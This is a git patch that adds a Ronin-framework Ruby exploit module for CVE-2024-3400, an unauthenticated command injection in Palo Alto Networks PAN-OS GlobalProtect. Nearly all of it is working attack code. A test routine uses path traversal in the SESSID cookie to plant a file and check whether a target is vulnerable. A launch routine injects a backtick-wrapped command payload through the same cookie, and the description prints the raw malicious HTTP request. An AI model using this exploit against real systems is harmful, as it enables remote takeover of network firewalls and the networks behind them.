From dda985a85bd43d186977ca6e2e79b18daeb9671b Mon Sep 17 00:00:00 2001
From: Postmodern <postmodern.mod3@gmail.com>
Date: Fri, 28 Jun 2024 21:42:47 -0700
Subject: [PATCH] Added a PoC for CVE-2024-3400 (closes #1).

---
 exploits/palo-alto/pan-os/CVE-2024-3400.rb | 92 ++++++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100755 exploits/palo-alto/pan-os/CVE-2024-3400.rb

diff --git a/exploits/palo-alto/pan-os/CVE-2024-3400.rb b/exploits/palo-alto/pan-os/CVE-2024-3400.rb
new file mode 100755
index 0000000..a2f3617
--- /dev/null
+++ b/exploits/palo-alto/pan-os/CVE-2024-3400.rb
@@ -0,0 +1,92 @@
+#!/usr/bin/env -S ronin-exploits run -f
+
+require 'ronin/exploits/command_injection'
+require 'ronin/exploits/mixins/http'
+
+module Ronin
+  module Exploits
+    #
+    # PoC for CVE-2024-3400.
+    #
+    # This exploit is based on the following previous PoCs:
+    #
+    # * https://github.com/CONDITIONBLACK/CVE-2024-3400-POC
+    # * https://github.com/ZephrFish/CVE-2024-3400-Canary
+    # * https://github.com/Kr0ff/cve-2024-3400
+    #
+    class CVE_2024_3400 < CommandInjection
+
+      include Mixins::HTTP
+
+      register 'palo-alto/pan-os/CVE-2024-3400'
+
+      quality :untested
+      release_date    '2024-04-16'
+      disclosure_date '2024-04-12'
+      advisory 'CVE-2024-3400'
+
+      author "Postmodern", email: "postmodern.mod3@gmail.com"
+      summary "Command injection in Palo Alto Networks PAN-OS"
+      description <<~DESC
+        Palo Alto Networks PAN-OS is vulnerable to a remote unauthenticated
+        command injection via the `SESSID` cookie parameter in it's
+        GlobalProtect feature.
+
+          GET /global-protect/login.esp HTTP/1.1
+          Host: example.com
+          Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`COMMAND`
+
+      DESC
+      references [
+        "https://github.com/CONDITIONBLACK/CVE-2024-3400-POC",
+        "https://github.com/ZephrFish/CVE-2024-3400-Canary",
+        "https://github.com/Kr0ff/cve-2024-3400"
+      ]
+
+      #
+      # Test whether the target system is vulnerable.
+      #
+      # It does this by sending a HTTP POST request to `/ssl-vpn/hipreport.esp`
+      # with the `SESSID` cookie parameter containing a path traversal back into
+      # the web application's images directory
+      # (`/global-protect/portal/images/`), which causes the `test.txt` file to
+      # be created within the images directory.
+      #
+      # If `/global-protect/portal/images/test.txt` can then be requested, and
+      # it returns a HTTP 403 status code, the host is considered vulnerable.
+      #
+      def test
+        file_name = 'test.txt'
+        file_path = "/global-protect/portal/images/#{file_name}"
+
+        sessid = File.join("../../../var/appweb/sslvpndocs",file_path)
+
+        response = http_post(
+          '/ssl-vpn/hipreport.esp', cookie: {'SESSID' => sessid}
+        )
+
+        if response.code == '200'
+          if http_get(file_path).code == '403'
+            Vulnerable('host is vulnerable')
+          else
+            NotVulnerable('host is patched')
+          end
+        else
+          NotVulnerable('host is patched')
+        end
+      end
+
+      #
+      # Sends a HTTP GET request to `/global-protect/login.esp` with the
+      # `SESSID` cookie parameter containing a directory traversal and the
+      # command payload wrapped in backticks.
+      #
+      def launch
+        sessid = "../../../../opt/panlogs/tmp/device_telemetry/minute/`#{payload}`"
+
+        http_get('/global-protect/login.esp', cookie: {'SESSID' => sessid})
+      end
+
+    end
+  end
+end